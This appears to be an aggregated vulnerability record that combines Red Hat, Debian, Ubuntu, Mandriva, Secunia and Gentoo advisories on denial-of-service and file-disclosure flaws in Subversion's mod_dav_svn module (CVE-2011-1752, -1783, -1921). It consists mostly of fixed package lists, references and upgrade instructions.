subversion-devel-1.6.11-2.el6_1.4.s390.rpm
subversion-devel-1.6.11-2.el6_1.4.s390x.rpm
subversion-gnome-1.6.11-2.el6_1.4.s390.rpm
subversion-gnome-1.6.11-2.el6_1.4.s390x.rpm
subversion-javahl-1.6.11-2.el6_1.4.s390.rpm
subversion-javahl-1.6.11-2.el6_1.4.s390x.rpm
subversion-kde-1.6.11-2.el6_1.4.s390.rpm
subversion-kde-1.6.11-2.el6_1.4.s390x.rpm
subversion-perl-1.6.11-2.el6_1.4.s390.rpm
subversion-perl-1.6.11-2.el6_1.4.s390x.rpm
subversion-ruby-1.6.11-2.el6_1.4.s390.rpm
subversion-ruby-1.6.11-2.el6_1.4.s390x.rpm
x86_64:
subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.x86_64.rpm
subversion-devel-1.6.11-2.el6_1.4.i686.rpm
subversion-devel-1.6.11-2.el6_1.4.x86_64.rpm
subversion-gnome-1.6.11-2.el6_1.4.i686.rpm
subversion-gnome-1.6.11-2.el6_1.4.x86_64.rpm
subversion-kde-1.6.11-2.el6_1.4.i686.rpm
subversion-kde-1.6.11-2.el6_1.4.x86_64.rpm
subversion-perl-1.6.11-2.el6_1.4.i686.rpm
subversion-perl-1.6.11-2.el6_1.4.x86_64.rpm
subversion-ruby-1.6.11-2.el6_1.4.i686.rpm
subversion-ruby-1.6.11-2.el6_1.4.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/subversion-1.6.11-2.el6_1.4.src.rpm
i386:
mod_dav_svn-1.6.11-2.el6_1.4.i686.rpm
subversion-1.6.11-2.el6_1.4.i686.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm
subversion-javahl-1.6.11-2.el6_1.4.i686.rpm
x86_64:
mod_dav_svn-1.6.11-2.el6_1.4.x86_64.rpm
subversion-1.6.11-2.el6_1.4.i686.rpm
subversion-1.6.11-2.el6_1.4.x86_64.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.x86_64.rpm
subversion-javahl-1.6.11-2.el6_1.4.i686.rpm
subversion-javahl-1.6.11-2.el6_1.4.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/subversion-1.6.11-2.el6_1.4.src.rpm
i386:
subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm
subversion-devel-1.6.11-2.el6_1.4.i686.rpm
subversion-gnome-1.6.11-2.el6_1.4.i686.rpm
subversion-kde-1.6.11-2.el6_1.4.i686.rpm
subversion-perl-1.6.11-2.el6_1.4.i686.rpm
subversion-ruby-1.6.11-2.el6_1.4.i686.rpm
noarch:
subversion-svn2cl-1.6.11-2.el6_1.4.noarch.rpm
x86_64:
subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.x86_64.rpm
subversion-devel-1.6.11-2.el6_1.4.i686.rpm
subversion-devel-1.6.11-2.el6_1.4.x86_64.rpm
subversion-gnome-1.6.11-2.el6_1.4.i686.rpm
subversion-gnome-1.6.11-2.el6_1.4.x86_64.rpm
subversion-kde-1.6.11-2.el6_1.4.i686.rpm
subversion-kde-1.6.11-2.el6_1.4.x86_64.rpm
subversion-perl-1.6.11-2.el6_1.4.i686.rpm
subversion-perl-1.6.11-2.el6_1.4.x86_64.rpm
subversion-ruby-1.6.11-2.el6_1.4.i686.rpm
subversion-ruby-1.6.11-2.el6_1.4.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2011-1752.html
https://www.redhat.com/security/data/cve/CVE-2011-1783.html
https://www.redhat.com/security/data/cve/CVE-2011-1921.html
https://access.redhat.com/security/updates/classification/#moderate
http://subversion.apache.org/security/CVE-2011-1783-advisory.txt
http://subversion.apache.org/security/CVE-2011-1752-advisory.txt
http://subversion.apache.org/security/CVE-2011-1921-advisory.txt
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2011 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFN75utXlSAg2UNWIIRAuXgAJ9fhhY1xxC7jRZbLGZA6ENr3dnTBQCgkdf0
J9nA8MJRlM/XVtyj3mbVErg=
=jujC
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. The Common Vulnerabilities and Exposures project
identifies the following problems:
CVE-2011-1752
The mod_dav_svn Apache HTTPD server module can be crashed though
when asked to deliver baselined WebDAV resources.
For the oldstable distribution (lenny), this problem has been fixed in
version 1.5.1dfsg1-7.
For the stable distribution (squeeze), this problem has been fixed in
version 1.6.12dfsg-6.
For the unstable distribution (sid), this problem has been fixed in
version 1.6.17dfsg-1. ==========================================================================
Ubuntu Security Notice USN-1144-1
June 06, 2011
subversion vulnerabilities
==========================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 11.04
- Ubuntu 10.10
- Ubuntu 10.04 LTS
Summary:
An attacker could send crafted input to the Subversion mod_dav_svn module
for Apache and cause it to crash or gain access to restricted files.
Software Description:
- subversion: Advanced version control system
Details:
Joe Schaefer discovered that the Subversion mod_dav_svn module for Apache
did not properly handle certain baselined WebDAV resource requests. (CVE-2011-1752)
Ivan Zhakov discovered that the Subversion mod_dav_svn module for Apache
did not properly handle certain requests. (CVE-2011-1921)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 11.04:
libapache2-svn 1.6.12dfsg-4ubuntu2.1
Ubuntu 10.10:
libapache2-svn 1.6.12dfsg-1ubuntu1.3
Ubuntu 10.04 LTS:
libapache2-svn 1.6.6dfsg-2ubuntu1.3
After a standard system update you need to restart any applications that
use Subversion, such as Apache when using mod_dav_svn, to make all the
necessary changes
| VAR-201106-0131 | CVE-2011-1752 | Apache Subversion Used in Apache HTTP Server Service disruption in (DoS) Vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.17, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request for a baselined WebDAV resource, as exploited in the wild in May 2011. Apache Subversion is prone to multiple vulnerabilities, including two denial-of-service issues and an information-disclosure issue.
Attackers can exploit these issues to crash the application, exhaust all memory resources, or obtain potentially sensitive information.
Versions prior to Subversion 1.6.17 are vulnerable.
The mod_dav_svn Apache HTTPD server module may in certain cenarios
enter a logic loop which does not exit and which allocates emory in
each iteration, ultimately exhausting all the available emory on the
server which can lead to a DoS (Denial Of Service) (CVE-2011-1783).
The mod_dav_svn Apache HTTPD server module may leak to remote users
the file contents of files configured to be unreadable by those users
(CVE-2011-1921).
Packages for 2009.0 are provided as of the Extended Maintenance
Program. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iD8DBQFN6cg2mqjQ0CJFipgRAqj2AKCRyKt813e0OmWSTU5bL58KCmUwowCfT6RY
DDOtowgSctAg4EX+tLXIvRQ=
=zsmM
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. ----------------------------------------------------------------------
Join Secunia @ FIRST Conference, 12-17 June, Hilton Vienna, Austria
See to the presentation "The Dynamics and Threats of End-Point Software Portfolios" by Secunia's Research Analyst Director, Stefan Frei.
Read more:
http://conference.first.org/
----------------------------------------------------------------------
TITLE:
Apache Subversion mod_dav_svn Two Denial of Service Vulnerabilities
SECUNIA ADVISORY ID:
SA44681
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/44681/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=44681
RELEASE DATE:
2011-06-02
DISCUSS ADVISORY:
http://secunia.com/advisories/44681/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/44681/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=44681
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Two vulnerabilities have been reported in Apache Subversion, which
can be exploited by malicious people to cause a DoS (Denial of
Service).
SOLUTION:
Update to version 1.6.17.
PROVIDED AND/OR DISCOVERED BY:
1) Reported by the vendor
2) The vendor credits Ivan Zhakov, VisualSVN.
ORIGINAL ADVISORY:
http://subversion.apache.org/security/CVE-2011-1752-advisory.txt
http://subversion.apache.org/security/CVE-2011-1783-advisory.txt
http://subversion.apache.org/security/CVE-2011-1921-advisory.txt
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201309-11
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Low
Title: Subversion: Multiple vulnerabilities
Date: September 23, 2013
Bugs: #350166, #356741, #369065, #463728, #463860, #472202, #482166
ID: 201309-11
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in Subversion, allowing
attackers to cause a Denial of Service, escalate privileges, or obtain
sensitive information.
Background
==========
Subversion is a versioning system designed to be a replacement for CVS.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-vcs/subversion < 1.7.13 >= 1.7.13
Description
===========
Multiple vulnerabilities have been discovered in Subversion. Please
review the CVE identifiers referenced below for details. A local attacker could escalate his privileges
to the user running svnserve.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Subversion users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-vcs/subversion-1.7.13"
References
==========
[ 1 ] CVE-2010-4539
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4539
[ 2 ] CVE-2010-4644
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4644
[ 3 ] CVE-2011-0715
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0715
[ 4 ] CVE-2011-1752
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1752
[ 5 ] CVE-2011-1783
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1783
[ 6 ] CVE-2011-1921
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1921
[ 7 ] CVE-2013-1845
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1845
[ 8 ] CVE-2013-1846
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1846
[ 9 ] CVE-2013-1847
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1847
[ 10 ] CVE-2013-1849
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1849
[ 11 ] CVE-2013-1884
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1884
[ 12 ] CVE-2013-1968
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1968
[ 13 ] CVE-2013-2088
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2088
[ 14 ] CVE-2013-2112
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2112
[ 15 ] CVE-2013-4131
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4131
[ 16 ] CVE-2013-4277
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4277
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201309-11.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2013 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: subversion security update
Advisory ID: RHSA-2011:0862-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2011-0862.html
Issue date: 2011-06-08
CVE Names: CVE-2011-1752 CVE-2011-1783 CVE-2011-1921
=====================================================================
1. Summary:
Updated subversion packages that fix three security issues are now
available for Red Hat Enterprise Linux 5 and 6.
The Red Hat Security Response Team has rated this update as having moderate
security impact. Common Vulnerability Scoring System (CVSS) base scores,
which give detailed severity ratings, are available for each vulnerability
from the CVE links in the References section.
2. Relevant releases/architectures:
RHEL Desktop Workstation (v. 5 client) - i386, x86_64
Red Hat Enterprise Linux (v. 5 server) - i386, ia64, ppc, s390x, x86_64
Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, noarch, x86_64
Red Hat Enterprise Linux HPC Node Optional (v. 6) - noarch, x86_64
Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 6) - i386, noarch, ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, noarch, x86_64
3. Description:
Subversion (SVN) is a concurrent version control system which enables one
or more users to collaborate in developing and maintaining a hierarchy of
files and directories while keeping a history of all changes. The
mod_dav_svn module is used with the Apache HTTP Server to allow access to
Subversion repositories via HTTP.
An infinite loop flaw was found in the way the mod_dav_svn module processed
certain data sets. If the SVNPathAuthz directive was set to
"short_circuit", and path-based access control for files and directories
was enabled, a malicious, remote user could use this flaw to cause the
httpd process serving the request to consume an excessive amount of system
memory. (CVE-2011-1783)
A NULL pointer dereference flaw was found in the way the mod_dav_svn module
processed requests submitted against the URL of a baselined resource. A
malicious, remote user could use this flaw to cause the httpd process
serving the request to crash. (CVE-2011-1752)
An information disclosure flaw was found in the way the mod_dav_svn
module processed certain URLs when path-based access control for files and
directories was enabled. A malicious, remote user could possibly use this
flaw to access certain files in a repository that would otherwise not be
accessible to them. Note: This vulnerability cannot be triggered if the
SVNPathAuthz directive is set to "short_circuit". Upstream acknowledges Joe Schaefer of the Apache Software
Foundation as the original reporter of CVE-2011-1752; Ivan Zhakov of
VisualSVN as the original reporter of CVE-2011-1783; and Kamesh
Jayachandran of CollabNet, Inc. as the original reporter of CVE-2011-1921.
All Subversion users should upgrade to these updated packages, which
contain backported patches to correct these issues. After installing the
updated packages, you must restart the httpd daemon, if you are using
mod_dav_svn, for the update to take effect.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/kb/docs/DOC-11259
5. Bugs fixed (http://bugzilla.redhat.com/):
709111 - CVE-2011-1752 subversion (mod_dav_svn): DoS (crash) via request to deliver baselined WebDAV resources
709112 - CVE-2011-1783 subversion (mod_dav_svn): DoS (excessive memory use) when configured to provide path-based access control
709114 - CVE-2011-1921 subversion (mod_dav_svn): File contents disclosure of files configured to be unreadable by those users
6. Package List:
RHEL Desktop Workstation (v. 5 client):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/subversion-1.6.11-7.el5_6.4.src.rpm
i386:
mod_dav_svn-1.6.11-7.el5_6.4.i386.rpm
subversion-1.6.11-7.el5_6.4.i386.rpm
subversion-debuginfo-1.6.11-7.el5_6.4.i386.rpm
subversion-devel-1.6.11-7.el5_6.4.i386.rpm
subversion-javahl-1.6.11-7.el5_6.4.i386.rpm
subversion-perl-1.6.11-7.el5_6.4.i386.rpm
subversion-ruby-1.6.11-7.el5_6.4.i386.rpm
x86_64:
mod_dav_svn-1.6.11-7.el5_6.4.x86_64.rpm
subversion-1.6.11-7.el5_6.4.i386.rpm
subversion-1.6.11-7.el5_6.4.x86_64.rpm
subversion-debuginfo-1.6.11-7.el5_6.4.i386.rpm
subversion-debuginfo-1.6.11-7.el5_6.4.x86_64.rpm
subversion-devel-1.6.11-7.el5_6.4.i386.rpm
subversion-devel-1.6.11-7.el5_6.4.x86_64.rpm
subversion-javahl-1.6.11-7.el5_6.4.x86_64.rpm
subversion-perl-1.6.11-7.el5_6.4.x86_64.rpm
subversion-ruby-1.6.11-7.el5_6.4.x86_64.rpm
Red Hat Enterprise Linux (v. 5 server):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/os/SRPMS/subversion-1.6.11-7.el5_6.4.src.rpm
i386:
mod_dav_svn-1.6.11-7.el5_6.4.i386.rpm
subversion-1.6.11-7.el5_6.4.i386.rpm
subversion-debuginfo-1.6.11-7.el5_6.4.i386.rpm
subversion-devel-1.6.11-7.el5_6.4.i386.rpm
subversion-javahl-1.6.11-7.el5_6.4.i386.rpm
subversion-perl-1.6.11-7.el5_6.4.i386.rpm
subversion-ruby-1.6.11-7.el5_6.4.i386.rpm
ia64:
mod_dav_svn-1.6.11-7.el5_6.4.ia64.rpm
subversion-1.6.11-7.el5_6.4.ia64.rpm
subversion-debuginfo-1.6.11-7.el5_6.4.ia64.rpm
subversion-devel-1.6.11-7.el5_6.4.ia64.rpm
subversion-javahl-1.6.11-7.el5_6.4.ia64.rpm
subversion-perl-1.6.11-7.el5_6.4.ia64.rpm
subversion-ruby-1.6.11-7.el5_6.4.ia64.rpm
ppc:
mod_dav_svn-1.6.11-7.el5_6.4.ppc.rpm
subversion-1.6.11-7.el5_6.4.ppc.rpm
subversion-1.6.11-7.el5_6.4.ppc64.rpm
subversion-debuginfo-1.6.11-7.el5_6.4.ppc.rpm
subversion-debuginfo-1.6.11-7.el5_6.4.ppc64.rpm
subversion-devel-1.6.11-7.el5_6.4.ppc.rpm
subversion-devel-1.6.11-7.el5_6.4.ppc64.rpm
subversion-javahl-1.6.11-7.el5_6.4.ppc.rpm
subversion-perl-1.6.11-7.el5_6.4.ppc.rpm
subversion-ruby-1.6.11-7.el5_6.4.ppc.rpm
s390x:
mod_dav_svn-1.6.11-7.el5_6.4.s390x.rpm
subversion-1.6.11-7.el5_6.4.s390.rpm
subversion-1.6.11-7.el5_6.4.s390x.rpm
subversion-debuginfo-1.6.11-7.el5_6.4.s390.rpm
subversion-debuginfo-1.6.11-7.el5_6.4.s390x.rpm
subversion-devel-1.6.11-7.el5_6.4.s390.rpm
subversion-devel-1.6.11-7.el5_6.4.s390x.rpm
subversion-javahl-1.6.11-7.el5_6.4.s390x.rpm
subversion-perl-1.6.11-7.el5_6.4.s390x.rpm
subversion-ruby-1.6.11-7.el5_6.4.s390x.rpm
x86_64:
mod_dav_svn-1.6.11-7.el5_6.4.x86_64.rpm
subversion-1.6.11-7.el5_6.4.i386.rpm
subversion-1.6.11-7.el5_6.4.x86_64.rpm
subversion-debuginfo-1.6.11-7.el5_6.4.i386.rpm
subversion-debuginfo-1.6.11-7.el5_6.4.x86_64.rpm
subversion-devel-1.6.11-7.el5_6.4.i386.rpm
subversion-devel-1.6.11-7.el5_6.4.x86_64.rpm
subversion-javahl-1.6.11-7.el5_6.4.x86_64.rpm
subversion-perl-1.6.11-7.el5_6.4.x86_64.rpm
subversion-ruby-1.6.11-7.el5_6.4.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/subversion-1.6.11-2.el6_1.4.src.rpm
i386:
mod_dav_svn-1.6.11-2.el6_1.4.i686.rpm
subversion-1.6.11-2.el6_1.4.i686.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm
subversion-devel-1.6.11-2.el6_1.4.i686.rpm
subversion-gnome-1.6.11-2.el6_1.4.i686.rpm
subversion-javahl-1.6.11-2.el6_1.4.i686.rpm
subversion-kde-1.6.11-2.el6_1.4.i686.rpm
subversion-perl-1.6.11-2.el6_1.4.i686.rpm
subversion-ruby-1.6.11-2.el6_1.4.i686.rpm
noarch:
subversion-svn2cl-1.6.11-2.el6_1.4.noarch.rpm
x86_64:
mod_dav_svn-1.6.11-2.el6_1.4.x86_64.rpm
subversion-1.6.11-2.el6_1.4.i686.rpm
subversion-1.6.11-2.el6_1.4.x86_64.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.x86_64.rpm
subversion-devel-1.6.11-2.el6_1.4.i686.rpm
subversion-devel-1.6.11-2.el6_1.4.x86_64.rpm
subversion-gnome-1.6.11-2.el6_1.4.i686.rpm
subversion-gnome-1.6.11-2.el6_1.4.x86_64.rpm
subversion-javahl-1.6.11-2.el6_1.4.i686.rpm
subversion-javahl-1.6.11-2.el6_1.4.x86_64.rpm
subversion-kde-1.6.11-2.el6_1.4.i686.rpm
subversion-kde-1.6.11-2.el6_1.4.x86_64.rpm
subversion-perl-1.6.11-2.el6_1.4.i686.rpm
subversion-perl-1.6.11-2.el6_1.4.x86_64.rpm
subversion-ruby-1.6.11-2.el6_1.4.i686.rpm
subversion-ruby-1.6.11-2.el6_1.4.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/subversion-1.6.11-2.el6_1.4.src.rpm
noarch:
subversion-svn2cl-1.6.11-2.el6_1.4.noarch.rpm
x86_64:
mod_dav_svn-1.6.11-2.el6_1.4.x86_64.rpm
subversion-1.6.11-2.el6_1.4.i686.rpm
subversion-1.6.11-2.el6_1.4.x86_64.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.x86_64.rpm
subversion-devel-1.6.11-2.el6_1.4.i686.rpm
subversion-devel-1.6.11-2.el6_1.4.x86_64.rpm
subversion-gnome-1.6.11-2.el6_1.4.i686.rpm
subversion-gnome-1.6.11-2.el6_1.4.x86_64.rpm
subversion-javahl-1.6.11-2.el6_1.4.i686.rpm
subversion-javahl-1.6.11-2.el6_1.4.x86_64.rpm
subversion-kde-1.6.11-2.el6_1.4.i686.rpm
subversion-kde-1.6.11-2.el6_1.4.x86_64.rpm
subversion-perl-1.6.11-2.el6_1.4.i686.rpm
subversion-perl-1.6.11-2.el6_1.4.x86_64.rpm
subversion-ruby-1.6.11-2.el6_1.4.i686.rpm
subversion-ruby-1.6.11-2.el6_1.4.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/subversion-1.6.11-2.el6_1.4.src.rpm
i386:
mod_dav_svn-1.6.11-2.el6_1.4.i686.rpm
subversion-1.6.11-2.el6_1.4.i686.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm
subversion-javahl-1.6.11-2.el6_1.4.i686.rpm
ppc64:
mod_dav_svn-1.6.11-2.el6_1.4.ppc64.rpm
subversion-1.6.11-2.el6_1.4.ppc.rpm
subversion-1.6.11-2.el6_1.4.ppc64.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.ppc.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.ppc64.rpm
s390x:
mod_dav_svn-1.6.11-2.el6_1.4.s390x.rpm
subversion-1.6.11-2.el6_1.4.s390.rpm
subversion-1.6.11-2.el6_1.4.s390x.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.s390.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.s390x.rpm
x86_64:
mod_dav_svn-1.6.11-2.el6_1.4.x86_64.rpm
subversion-1.6.11-2.el6_1.4.i686.rpm
subversion-1.6.11-2.el6_1.4.x86_64.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.x86_64.rpm
subversion-javahl-1.6.11-2.el6_1.4.i686.rpm
subversion-javahl-1.6.11-2.el6_1.4.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/subversion-1.6.11-2.el6_1.4.src.rpm
i386:
subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm
subversion-devel-1.6.11-2.el6_1.4.i686.rpm
subversion-gnome-1.6.11-2.el6_1.4.i686.rpm
subversion-kde-1.6.11-2.el6_1.4.i686.rpm
subversion-perl-1.6.11-2.el6_1.4.i686.rpm
subversion-ruby-1.6.11-2.el6_1.4.i686.rpm
noarch:
subversion-svn2cl-1.6.11-2.el6_1.4.noarch.rpm
ppc64:
subversion-debuginfo-1.6.11-2.el6_1.4.ppc.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.ppc64.rpm
subversion-devel-1.6.11-2.el6_1.4.ppc.rpm
subversion-devel-1.6.11-2.el6_1.4.ppc64.rpm
subversion-gnome-1.6.11-2.el6_1.4.ppc.rpm
subversion-gnome-1.6.11-2.el6_1.4.ppc64.rpm
subversion-javahl-1.6.11-2.el6_1.4.ppc.rpm
subversion-javahl-1.6.11-2.el6_1.4.ppc64.rpm
subversion-kde-1.6.11-2.el6_1.4.ppc.rpm
subversion-kde-1.6.11-2.el6_1.4.ppc64.rpm
subversion-perl-1.6.11-2.el6_1.4.ppc.rpm
subversion-perl-1.6.11-2.el6_1.4.ppc64.rpm
subversion-ruby-1.6.11-2.el6_1.4.ppc.rpm
subversion-ruby-1.6.11-2.el6_1.4.ppc64.rpm
s390x:
subversion-debuginfo-1.6.11-2.el6_1.4.s390.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.s390x.rpm
subversion-devel-1.6.11-2.el6_1.4.s390.rpm
subversion-devel-1.6.11-2.el6_1.4.s390x.rpm
subversion-gnome-1.6.11-2.el6_1.4.s390.rpm
subversion-gnome-1.6.11-2.el6_1.4.s390x.rpm
subversion-javahl-1.6.11-2.el6_1.4.s390.rpm
subversion-javahl-1.6.11-2.el6_1.4.s390x.rpm
subversion-kde-1.6.11-2.el6_1.4.s390.rpm
subversion-kde-1.6.11-2.el6_1.4.s390x.rpm
subversion-perl-1.6.11-2.el6_1.4.s390.rpm
subversion-perl-1.6.11-2.el6_1.4.s390x.rpm
subversion-ruby-1.6.11-2.el6_1.4.s390.rpm
subversion-ruby-1.6.11-2.el6_1.4.s390x.rpm
x86_64:
subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.x86_64.rpm
subversion-devel-1.6.11-2.el6_1.4.i686.rpm
subversion-devel-1.6.11-2.el6_1.4.x86_64.rpm
subversion-gnome-1.6.11-2.el6_1.4.i686.rpm
subversion-gnome-1.6.11-2.el6_1.4.x86_64.rpm
subversion-kde-1.6.11-2.el6_1.4.i686.rpm
subversion-kde-1.6.11-2.el6_1.4.x86_64.rpm
subversion-perl-1.6.11-2.el6_1.4.i686.rpm
subversion-perl-1.6.11-2.el6_1.4.x86_64.rpm
subversion-ruby-1.6.11-2.el6_1.4.i686.rpm
subversion-ruby-1.6.11-2.el6_1.4.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/subversion-1.6.11-2.el6_1.4.src.rpm
i386:
mod_dav_svn-1.6.11-2.el6_1.4.i686.rpm
subversion-1.6.11-2.el6_1.4.i686.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm
